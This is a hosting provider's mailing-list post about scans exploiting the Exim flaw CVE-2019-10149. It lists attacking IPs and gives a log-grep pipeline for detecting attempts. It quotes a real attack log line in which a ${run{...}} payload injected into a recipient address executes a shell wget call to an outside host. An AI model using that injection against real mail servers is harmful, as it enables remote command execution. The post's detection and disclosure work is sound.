[bitfolk] Scans attempting to exploit CVE-2019-10149 have been in the wild for some days

Hello, I've just ran a grep on all of my mail logs for the string "run{" to see who's been trying to exploit CVE-2019-10149. A successful match looks like this on my MTA (Exim): 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support(a)service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}(a)mail.bitfolk.com>om>: Unrouteable address This appears to be attempting to execute: sh -c "wget 64.50.180.45/tmp/85.119.82.70 on my host. I assume that the attacker watches their HTTP logs for requests for /tmp/85.119.82.70 and then they know they've found an exploitable host. Here's a list of offenders sorted by attempt count: Count Attacker Country AS ------------------------------------------------------------------------------------------------- 18 89.248.171.57 ( scanner20.openportstats.com) NL INT-NETWORK, SC [AS202425] 8 163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB AS12876, FR [AS12876] 6 104.237.134.176 (li810-176.members.linode.com) US LINODE-AP Linode, LLC, US [AS63949] 3 149.56.142.192 ( 192.ip-149-56-142.net) CA OVH, FR [AS16276] 3 104.200.137.239 ( mx239.odesktrack.com) US TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562] 2 27.69.172.229 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 95.139.230.110 (node-110-230-139-95.domolink.tula.net) RU ROSTELECOM-AS, RU [AS12389] 1 79.173.123.131 ( Unset reverse DNS) RU TKTOR, RU [AS44270] 1 46.150.228.178 ( Unset reverse DNS) RU ABRIKOS-AS, RU [AS196768] 1 27.70.156.161 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 27.69.172.239 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] 1 27.69.172.214 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552] Most worrying, a BitFolk IP was amongst my findings. i.e. there is a BitFolk customer VPS also doing this. Most likely they have already been compromised by this technique. I've removed them from the results above but I expect if you search your own logs you'll find them. They have already been notified. I created the above output with this script: https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f To use it in this case would be something like: $ zcat -f /var/log/exim4/mainlog* \ | grep "run{" \ | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \ | sort | uniq -c | sort -rn | ~/attackers.sh The awk is separating an IP address out of the [1.2.3.4]. The sort/uniq/sort is generating an event count. attackers.sh is merely getting extra info about the IP address. Cheers, Andy -- https://bitfolk.com/ -- No-nonsense VPS hosting